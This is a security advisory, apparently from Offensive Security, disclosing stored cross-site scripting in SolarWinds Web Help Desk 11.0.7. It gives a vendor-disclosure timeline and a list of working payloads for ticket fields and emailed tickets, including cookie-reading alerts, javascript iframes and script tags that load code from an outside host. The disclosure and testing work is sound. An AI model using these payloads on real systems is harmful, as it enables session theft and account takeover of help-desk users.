Web Help Desk by SolarWinds - Stored XSS

                                                # Author: loneferret of Offensive Security
# Product: Web Help Desk by SolarWinds
# Version: 11.0.7 (older versions may be affected)
# Vendor Site: http://www.webhelpdesk.com
# Software Download: http://www.webhelpdesk.com/help-desk-software/

# Discovered: August 18th 2012
# Disclosure:
# August 19th 2012: Reported to CERT
# August 24th 2012: Public disclosure date is October 8th 2012
# August 28th 2012: Vendor responded, should fix by disclosure date
# August 29th 2012: Vendor asked information on Stored XSS in 'Rejected E-Mail Section'
# August 29th 2012: Sent vendor instructions on how to trigger XSS (not fully documented here)*
# September 21 2012: Vendor sends pre-release version to test (11.0.8)
# September 23 2012: Replied. Still XSS in "Rejected E-Mail Section' but not in Tickets
# September 24 2012: Vendor replied saying "Rejected E-Mail" XSS slated to be fix in next version
# October 8th 2012: Public release

# Vulnerabilities:
# Stored XSS via client web ticket submit system
# Effected fields: Subject & Request Details
# Payload: <script>alert(document.cookie);</script>

# Stored XSS via E-Mail
# Tickets created automatically vis e-mail will also trigger the XSS when viewing.
# Following payloads are triggered with default regular expression filters 
# Body field
# Payloads:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>  
<iframe SRC="javascript:alert('XSS Body');"></iframe>

# Subject field
# Payloads:
<BODY ONLOAD=alert('XSS')>**
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>  
<iframe SRC="javascript:alert('XSS Subject');"></iframe>

# *Viewing rejected e-mails via the 'email.eml' in the "Raw Message Data" section.
# Some payloads:
# <SCRIPT SRC=http://ha.ckers.org/xss.js>
# <XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

# **To trigger XSS must click on "My Tickets" or "Group Tickets"